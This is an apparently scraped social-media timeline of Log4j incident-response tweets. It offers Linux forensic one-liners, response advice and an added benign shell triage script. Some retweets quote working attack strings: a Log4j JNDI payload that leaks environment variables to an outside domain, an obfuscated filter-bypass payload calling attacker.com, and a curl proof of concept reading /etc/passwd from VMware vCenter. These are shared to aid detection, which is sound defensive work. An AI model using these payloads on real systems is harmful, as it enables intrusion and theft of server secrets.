I am retiring this social media account. Find me as @hal_pomeranz@infosec.exchange

Orlando, FL
Joined November 2008
Hal Pomeranz retweeted
If you need help with Linux Forensics, please check out my repo with lots of content at the URL below, plus check out @CraigHRowland's and @hal_pomeranz's work too. #DFIR #log4j linuxdfir.ashemery.com/ #DFIR #log4j
Or just try: "ls -l /proc/[0-9]*/exe 2>/dev/null | awk '/ -> / {print $NF}' | sort" Shows all EXE paths in sorted order making it easier to spot outliers #log4j
Another fun Linux command line: "sudo ls -l /proc/[0-9]*/exe 2>/dev/null | awk '/ -> / && !/\/usr\/(lib(exec)?|s?bin)\// {print $9, $10, $11}' | sed 's,/proc/\([0-9]*\)/exe,\1,'" Display PIDs with non-standard EXE paths
Hal Pomeranz retweeted
Good morning folks. If you're patching #log4j today on an Internet facing service, you need to be doing an incident response too. The reality is that someone else almost certainly beat you to it. Patching doesn't remove the existing compromise.
Another vuln where strict egress filtering would have greatly reduced possible impact to your environment. Make sure implementing egress filtering is part of your recovery plan. #log4j
Helpful Linux command-lines: "find /tmp /var/tmp /dev/shm -type f \( -perm -0100 -o -perm -0001 \)" Looks through tmpdirs for files with execute set for self or others—coin miners, install scripts, etc. #log4j
Side tweet (and cannot believe I'm writing this): Managers & up in orgs, please read this thread. If you call staff back in or cancel vacations to deal with log4j... yes, you *can* do that. But...
Hal Pomeranz retweeted
I've prepared a @RealTryHackMe room to demonstrate #log4j #log4shell CVE-2021-44228, explaining the vulnerability, attack vector, and more importantly, detection, mitigations and patching. Working with THM staff to get this in your hands -- it should be available soon.
If you’re struggling with the Linux forensics in the wake of #log4j, archive.org/details/HalLinux… may help. As always, feel free to reach out—I’m here to help with everything from simple syntax questions all the way up to full consulting engagements.
There may be earlier exploitation, but "find / -mtime -4" is a good way to look for weekend #log4j carnage on your Linux servers. RCE is likely unprivileged, so focus first on [/var]/tmp, /dev/shm, and similar world-writable directories.
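A small sh triage helper that combines the /proc exe check and the tmp-directory find from the tweets above; it is an added example, not Hal's own script. Beyond the tweets, it also flags processes whose binary has been unlinked since launch, which ls shows as a "(deleted)" link target. It assumes a Linux /proc layout and GNU find (for -printf); every function name and the sample input are mine.

```shell
#!/bin/sh
# Added triage helper; not from the thread above. Assumes a Linux /proc
# layout and GNU find (-printf). Sample input in the test is constructed.

# Executables under these trees are treated as "standard"; anything else is
# worth a second look (same idea as the awk filter in the thread).
STANDARD_EXE_RE='^/usr/(lib(exec)?|s?bin)/'

# flag_odd_exes: read "ls -l /proc/PID/exe" output on stdin and print
# "PID TARGET" for each process whose binary is outside the standard trees
# or has been unlinked since it started (ls prints the target as
# "... (deleted)", a common sign of a dropper that removed itself).
flag_odd_exes() {
    awk -v std="$STANDARD_EXE_RE" '
        / -> / {
            split($0, parts, " -> ")
            target = parts[2]
            match($0, /\/proc\/[0-9]+\/exe/)
            # strip the leading "/proc/" (6 chars) and trailing "/exe" (4 chars)
            pid = substr($0, RSTART + 6, RLENGTH - 10)
            if (target ~ /\(deleted\)$/ || target !~ std)
                print pid, target
        }'
}

# scan_tmp_exec: executable regular files in the usual world-writable staging
# directories (the find predicates are the ones from the thread), prefixed
# with mtime and owner so recent drops sort to the top.
scan_tmp_exec() {
    find /tmp /var/tmp /dev/shm -type f \( -perm -0100 -o -perm -0001 \) \
        -printf '%TY-%Tm-%Td %TH:%TM %u %p\n' 2>/dev/null | sort -r
}

# triage: run both checks against the live system (run as root so every
# /proc/PID/exe link is readable).
triage() {
    echo "== processes with non-standard or deleted executables =="
    ls -l /proc/[0-9]*/exe 2>/dev/null | flag_odd_exes
    echo "== executable files in tmp directories (newest first) =="
    scan_tmp_exec
}

# Only touch the live system when explicitly asked: ./triage.sh --run
case "${1:-}" in
    --run) triage ;;
esac
```

Review the output by hand: a legitimately packaged service in /opt will show up too, so the list is a starting point for inspection, not a verdict.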
Made 2 edits to the deck from suggestions by @mubix: a slight wording change to fix a small error. Added a "how do we avoid repeats?" slide. Other constructive criticism welcomed! Will give credit if you want it. If you need to keep a low profile, I'll say "some anonymous source".
If you've not already briefed your executives or board about Log4j, you will soon. Here's a powerful 4-page PPT deck you can use to get the issue across to them. FYI: this was developed by myself and two execs who wish to remain nameless. Please share! infosecinnovations.com/post/…
#Log4J based on what I've seen, there is evidence that a worm will be developed for this in the next 24 to 48 hours. Self propagating with the ability to stand up a self hosted server on compromised endpoints. In addition to spraying traffic, dropping files, it will have c2c
Hal Pomeranz retweeted
In case anyone hasn't discovered this: the Log4J formatting is nestable, which means payloads like ${jndi:ldap://${env:user}.xyz.collab.com/a} will leak server-side env vars!
Hal Pomeranz retweeted
VMware vCenter unauthorized arbitrary file read PoC working on earlier versions (7.0.2.00100) [PoC] curl --insecure --path-as-is -s "$host/ui/vcav-bootstrap/rest/vcav-providers/provider-logo?url=file:///etc/passwd" github.com/l0ggg/VMware_vCen…
Hal Pomeranz retweeted
Amongst the frenzy of detection and prevention efforts for #log4j #log4shell CVE-2022-44228, @HuntressLabs team members including myself, @calebjstewart, and @jslagle have prepared a service to help you better test and detect vulnerable applications. log4shell.huntress.com
We’ve created a tool to help you detect applications that are vulnerable to CVE-2021-44228. (h/t @calebjstewart, @jslagle & @_JohnHammond) This is intended for testing purposes only and should be used on systems you’re authorized to test. hubs.ly/Q010G3ZG0
Hal Pomeranz retweeted
If you're filtering on "ldap", "jndi", or the ${lower:x} method, I have bad news for you: ${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-l}dap${env:BARFOO:-:}//attacker.com/a} This gets past every filter I've found so far. There's no shortage of these bypasses. #log4j
Hal Pomeranz retweeted
I will be teaching the @sansforensics FOR500 Windows Forensic Analysis course in San Juan, PR in January 2022 at the beautiful @gmsectec facilities. @SANSInstitute is coming to PR. Learn Computer Forensics with us. Registration Link below. sans.org/cyber-security-even…
I wish I was as in love with SBOM as many people are. I feel the cries of overtaxed responders, drowning & looking for hope in prioritization. Security response isn’t a romcom in which an SBOM hero leads to a happy ending to a crisis. It’s still a horror show of asset management.
Interested in up-to-date reports of #log4shell exploitation? Our API can help! Search today's reports by user-agent: isc.sans.edu/api/webhoneypot…:?json or by URL isc.sans.edu/api/webhoneypot…:?json #jq FTW for pretty output. #log4j #log4j2
Just got off phone with a client. Log4j is in their network. Vendor claims patch will be available next release... which is multiple months from now. Here's what you do if you're in this situation. 1. Keep calm. There's no need to panic. 2. Carefully read this thread. 1/?